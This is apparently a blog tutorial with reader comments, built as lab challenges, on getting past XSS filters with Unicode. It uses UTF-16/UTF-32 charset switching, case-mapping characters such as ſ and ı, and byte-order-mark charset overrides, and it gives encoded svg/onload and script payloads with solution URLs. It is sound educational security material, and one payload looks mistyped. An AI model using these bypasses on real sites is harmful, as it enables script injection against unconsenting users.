Xssing Web With Unicodes
Hello friends,
This is the second part of "Xssing Web". In this post I will show how to abuse Unicode to bypass XSS filters.
BTW, if you want to check the previous part, click here.
Note : If you think there are any mistakes in this post, kindly mention them in the comments.
I have developed several XSS challenges to show how Unicode can be used to bypass filters. If you want to try those challenges first, click here, and come back if you couldn't solve any.
Abusing Unicode :
So what is Unicode?
-> Unicode is a character encoding standard. It defines encodings such as UTF-8, UTF-16 and UTF-32.
1) UTF-8 :
Character Size : 1 to 4 bytes
Example :
Character "A" => 0x41
Character "¡" => 0xC2 0xA1
Character "ಓ" => 0xE0 0xB2 0x93
Character "𪨶" => 0xF0 0xAA 0xA8 0xB6
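If you want to check these byte sequences yourself, here is a minimal Python sketch. The helper name utf8_hex is just something I made up for illustration; it only relies on the built-in str.encode.

```python
# Encode each sample character as UTF-8 and print its bytes in hex.
# "utf8_hex" is a hypothetical helper name, not part of any library.

def utf8_hex(ch: str) -> str:
    """Return the UTF-8 bytes of ch as space-separated hex values."""
    return " ".join(f"0x{b:02X}" for b in ch.encode("utf-8"))

# U+0041, U+00A1, U+0C93 and U+2AA36: the four characters listed above.
samples = ["A", "\u00a1", "\u0c93", "\U0002aa36"]

for ch in samples:
    print(f"U+{ord(ch):04X} => {utf8_hex(ch)}")
```

The higher the code point, the more bytes UTF-8 needs, which is why the four samples come out as 1, 2, 3 and 4 bytes.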
2) UTF-16 :
Character Size : 2 or 4 bytes (characters outside the Basic Multilingual Plane use a surrogate pair)
However, in UTF-16 there are two byte orders in which a character can be represented.
i) UTF-16be (be- Big Endian) [Most Significant Byte First]
Example :
Character "A" => 0x00 0x41
ii) UTF-16le (le- Little Endian) [Least Significant Byte First]
Example :
Character "A" => 0x41 0x00
3) UTF-32 :
Character Size : 4 bytes
In UTF-32 there are also two byte orders in which a character can be represented.
i) UTF-32be (be- Big Endian) [Most Significant Byte First]
Example :
Character "A" => 0x00 0x00 0x00 0x41
ii) UTF-32le (le- Little Endian) [Least Significant Byte First]
Example :
Character "A" => 0x41 0x00 0x00 0x00
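The byte orders above can be reproduced with Python's built-in codecs. This is only a small sketch; hex_bytes is a made-up helper name. The last line also encodes a character outside the Basic Multilingual Plane, which takes 4 bytes in UTF-16 because it is stored as a surrogate pair.

```python
# Show how the same character is laid out under each UTF-16/UTF-32 byte order.
# "hex_bytes" is a hypothetical helper name used only for this illustration.

def hex_bytes(text: str, encoding: str) -> str:
    """Return the encoded bytes of text as space-separated hex values."""
    return " ".join(f"0x{b:02X}" for b in text.encode(encoding))

for enc in ("utf-16-be", "utf-16-le", "utf-32-be", "utf-32-le"):
    print(f"{enc:9} => {hex_bytes('A', enc)}")

# U+2AA36 lies outside the BMP, so UTF-16 needs two 16-bit units for it.
print("utf-16-be =>", hex_bytes("\U0002aa36", "utf-16-be"))
```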
Alright. Enough unicode theory.
Let's see some XSS filters that you can bypass using unicode.
Challenge 1 :
http://rakeshmane.com/lab/unicode/xss.php?x=payload&charset=utf-8
How would you bypass it?
Think.
Hint : You can control the charset of html response.
No luck?
It's simple, you just have to use UTF-16 encoding to bypass the filter.
Solution :
http://rakeshmane.com/lab/unicode/xss.php?x=%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00&charset=utf-16be
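To see where all those %00 bytes come from, here is a rough Python sketch that builds the same kind of query value. The function name utf16be_param and the choice of which characters to leave unescaped are my own assumptions; the markup is the one used in the solution above.

```python
from urllib.parse import quote

MARKUP = "<svg/onload=alert()>"

def utf16be_param(markup: str) -> str:
    """Percent-encode markup as UTF-16BE bytes for use in a query string.

    Hypothetical helper: "/", "=", "(" and ")" are left unescaped only so
    the result looks like the URL in the post.
    """
    return quote(markup.encode("utf-16-be"), safe="/=()")

encoded = utf16be_param(MARKUP)
print(encoded)

raw = MARKUP.encode("utf-16-be")
# Decoded as UTF-16BE, the bytes turn back into the original markup.
print(raw.decode("utf-16-be"))
# At byte level a NUL sits before every character, so a plain search
# for the ASCII bytes "<svg" finds nothing.
print(b"<svg" in raw)
```

The same bytes mean different things depending on the charset the response declares, and that is the whole trick of this challenge.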
Alright, now let's suppose the string "UTF-16" is filtered.
Challenge 2 :
http://rakeshmane.com/lab/unicode/xss1.php?x=payload&charset=utf-8
Now how would you bypass it?
Hint : You can control the charset of html response.
No luck?
It's also very simple, you can simply use UTF-32 encoding to bypass the filter.
Solution :
http://rakeshmane.com/lab/unicode/xss1.php?charset=UTF-32&x=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
BTW, did you notice that I added two extra null bytes at the beginning of our payload?
%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
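The UTF-32 payload can be rebuilt the same way. This sketch simply prepends the two extra null bytes mentioned above to the UTF-32BE bytes of the markup; utf32be_param and PADDING are names I picked for illustration.

```python
from urllib.parse import quote

MARKUP = "<svg/onload=alert()>"
PADDING = b"\x00\x00"  # the two extra null bytes from the post

def utf32be_param(markup: str, padding: bytes = PADDING) -> str:
    """Percent-encode padding plus the UTF-32BE bytes of markup.

    Hypothetical helper; "/", "=", "(" and ")" stay unescaped to match
    the look of the URL in the post.
    """
    return quote(padding + markup.encode("utf-32-be"), safe="/=()")

payload = utf32be_param(MARKUP)
print(payload)
```

Each character contributes three null bytes plus itself, so together with the padding the value starts with five %00 before the %3C.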
Abusing Unicode Case Mappings :
Now let's move towards unicode case mappings.
Let's see if there are any Unicode characters which, when mapped to upper or lower case, turn into English alphabet letters.
I wrote a small piece of JS code to find these characters. [You can get the code here]
We can use these Unicode characters to bypass some XSS filters.
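The JS code itself is not shown here, so as a stand-in here is a minimal Python sketch of the same idea. It is not the author's script: it scans the non-ASCII part of the Basic Multilingual Plane and keeps every character whose upper or lower case form is a single ASCII letter. The function name and the scan range are my assumptions, and results depend on the Unicode tables of the runtime.

```python
# Find non-ASCII characters whose case mapping lands on an ASCII letter.
# Hypothetical re-implementation in Python, not the original JS code.

def ascii_case_collisions(limit: int = 0x10000):
    """Return (upper_hits, lower_hits): code point -> resulting ASCII letter."""
    upper_hits, lower_hits = {}, {}
    for cp in range(0x80, limit):
        ch = chr(cp)
        up, low = ch.upper(), ch.lower()
        # Only single-character results are kept; mappings such as
        # one character to two letters are ignored in this sketch.
        if len(up) == 1 and up.isascii() and up.isalpha():
            upper_hits[cp] = up
        if len(low) == 1 and low.isascii() and low.isalpha():
            lower_hits[cp] = low
    return upper_hits, lower_hits

upper_hits, lower_hits = ascii_case_collisions()
for cp, letter in upper_hits.items():
    print(f"U+{cp:04X} upper => {letter}")
for cp, letter in lower_hits.items():
    print(f"U+{cp:04X} lower => {letter}")
```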
Challenge 3 :
http://rakeshmane.com/lab/unicode/xss2.php?x=payload
Could you solve it?
Hint : Check the image above
Let's try to solve it. As you can see in the image above, there is a Unicode character ſ [\u017f] which, when mapped to upper case, turns into the capital letter "S".
Our payload : <ſcript/src=./1></script>
Solution : http://rakeshmane.com/lab/unicode/xss2.php?x=<%C5%BFcript/src=./1></script>
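The challenge's server-side code is not shown, so the following is only a guess at the general shape of the bug: a filter that looks for an opening script tag before the value gets upper-cased. Both naive_filter_blocks and the order of operations are assumptions made for illustration.

```python
from urllib.parse import quote

def naive_filter_blocks(value: str) -> bool:
    """Hypothetical filter: reject input containing an opening <script tag."""
    return "<script" in value.lower()

payload = "<\u017fcript/src=./1></script>"

# U+017F is not the letter "s", so the filter sees no "<script".
print(naive_filter_blocks(payload))
# After upper-casing, U+017F has become a plain "S".
print(payload.upper())
# UTF-8 percent-encoding of U+017F, as used in the solution URL.
print(quote("\u017f"))
```

The point is only that the check runs on one form of the string and the browser receives another.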
Now let's make it a little harder.
Challenge 4 :
http://rakeshmane.com/lab/unicode/xss3.php?x=payload
Could you XSS now?
No? Ah. It's also very simple.
Let's check the image above again. You can see there's a Unicode character ı [\u0131] which, when mapped to upper case, turns into the capital letter "I".
Our payload : <scrıpt/src=./1></script>
Solution : http://rakeshmane.com/lab/unicode/xss3.php?x=<scr%C4%B1pt/src=./1></script>
Now let's try another challenge.
Challenge 5 :
http://rakeshmane.com/lab/unicode/xss4.php?x=payload
Try to solve it.
No luck? Go back to the image above once more. The Unicode character K [\u212a] (KELVIN SIGN), when mapped to lower case, turns into the letter "k".
Our payload : x oncliK=aler$t()
Tool to convert unicode code points to UTF-8 bytes :
http://www.ltg.ed.ac.uk/~richard/utf-8.cgi?input=0131&mode=hex
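If the online tool is unavailable, the same conversion is a couple of lines of Python. This is a small sketch; codepoint_to_utf8 is a name I made up, and it returns the bytes already percent-encoded so they can be pasted into a URL.

```python
# Convert a hex code point such as "0131" into percent-encoded UTF-8 bytes.
# "codepoint_to_utf8" is a hypothetical helper name.

def codepoint_to_utf8(hex_codepoint: str) -> str:
    """Return the UTF-8 bytes of the given code point as %XX%XX..."""
    ch = chr(int(hex_codepoint, 16))
    return "".join(f"%{b:02X}" for b in ch.encode("utf-8"))

# The three characters used in challenges 3, 4 and 5.
for cp in ("017f", "0131", "212a"):
    print(f"U+{cp.upper()} => {codepoint_to_utf8(cp)}")
```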
Abusing BOM - Byte Order Mark :
What is BOM ?
For the 16- and 32-bit representations, a computer receiving text from arbitrary sources needs to know which byte order the integers are encoded in. Because the BOM itself is encoded in the same scheme as the rest of the document, but has a known value, the consumer of the text can examine these first few bytes to determine the encoding.
- Wikipedia
Note : The page must begin with the BOM character.
- BOM Character :
For UTF-16 Encoding:
Big Endian : 0xFE 0xFF
Little Endian : 0xFF 0xFE
For UTF-32 Encoding:
Big Endian : 0x00 0x00 0xFE 0xFF
Little Endian : 0xFF 0xFE 0x00 0x00
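Python ships these BOM values as constants in the codecs module, so a consumer-side check can be sketched like this. sniff_bom is a hypothetical helper, not a browser's actual algorithm. Note that the UTF-32LE BOM starts with the UTF-16LE BOM, so the longer ones have to be tested first.

```python
import codecs

# Longer BOMs first: BOM_UTF32_LE (FF FE 00 00) begins with BOM_UTF16_LE (FF FE).
BOMS = [
    (codecs.BOM_UTF32_BE, "utf-32-be"),
    (codecs.BOM_UTF32_LE, "utf-32-le"),
    (codecs.BOM_UTF16_BE, "utf-16-be"),
    (codecs.BOM_UTF16_LE, "utf-16-le"),
]

def sniff_bom(data: bytes):
    """Return the encoding implied by a leading BOM, or None if there is none."""
    for bom, name in BOMS:
        if data.startswith(bom):
            return name
    return None

print(sniff_bom(b"\xfe\xff\x00<"))
print(sniff_bom(b"\xff\xfe\x00\x00<\x00\x00\x00"))
print(sniff_bom(b"<html>"))
```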
Challenge 6 :
http://rakeshmane.com/lab/unicode/xss5.php?q=payload
This is going to be a hard one.
Couldn't solve it?
Hint : BOM
Still no luck?
Let me tell you one interesting thing about the BOM character: it allows you to override the charset of the page. The only requirement is that the page should begin with this character.
So to override the page encoding with UTF-16be you can use the BOM 0xFE 0xFF; for UTF-32be you can use 0x00 0x00 0xFE 0xFF.
UTF-16BE Solution:
http://rakeshmane.com/lab/unicode/xss5.php?q=%fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E
UTF-32BE Solution:
http://rakeshmane.com/lab/unicode/xss5.php?q=%00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
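Both BOM payloads follow the same recipe: the BOM first, then the markup encoded in the matching byte order. Here is a rough Python sketch of that recipe; bom_param is a made-up helper name. Python's generic "utf-16" and "utf-32" codecs also pick the byte order from a leading BOM, which gives a quick local check.

```python
import codecs
from urllib.parse import quote

MARKUP = "<svg/onload=alert()>"

def bom_param(markup: str, bom: bytes, encoding: str) -> str:
    """Percent-encode a BOM followed by markup in the given encoding.

    Hypothetical helper; "/", "=", "(" and ")" stay unescaped to match
    the look of the URLs in the post.
    """
    return quote(bom + markup.encode(encoding), safe="/=()")

utf16_payload = bom_param(MARKUP, codecs.BOM_UTF16_BE, "utf-16-be")
utf32_payload = bom_param(MARKUP, codecs.BOM_UTF32_BE, "utf-32-be")
print(utf16_payload)
print(utf32_payload)

# The generic codecs read the BOM, choose the byte order and drop the BOM.
raw16 = codecs.BOM_UTF16_BE + MARKUP.encode("utf-16-be")
raw32 = codecs.BOM_UTF32_BE + MARKUP.encode("utf-32-be")
print(raw16.decode("utf-16"))
print(raw32.decode("utf-32"))
```

quote() emits upper-case hex digits, so the output differs from the URLs above only in the case of %fe%ff.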
That's enough for today :)
References :
https://www.w3.org/International/questions/qa-byte-order-mark
https://en.wikipedia.org/wiki/Byte_order_mark
http://www.fileformat.info/info/unicode/utf8.htm
http://www.fileformat.info/info/charset/UTF-16/list.htm
https://github.com/numirias/ctf/blob/master/writeup-google-ctf-2017-geokitties-v2.md
https://stackoverflow.com/questions/4655250/difference-between-utf-8-and-utf-16
https://stackoverflow.com/questions/496321/utf-8-utf-16-and-utf-32
But how common is it to be able to change the charset with a query param?
not common at all
Leet ;_;
\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
from where u got this? I could not find anywhere equivalent to this
Gold Gold Post <3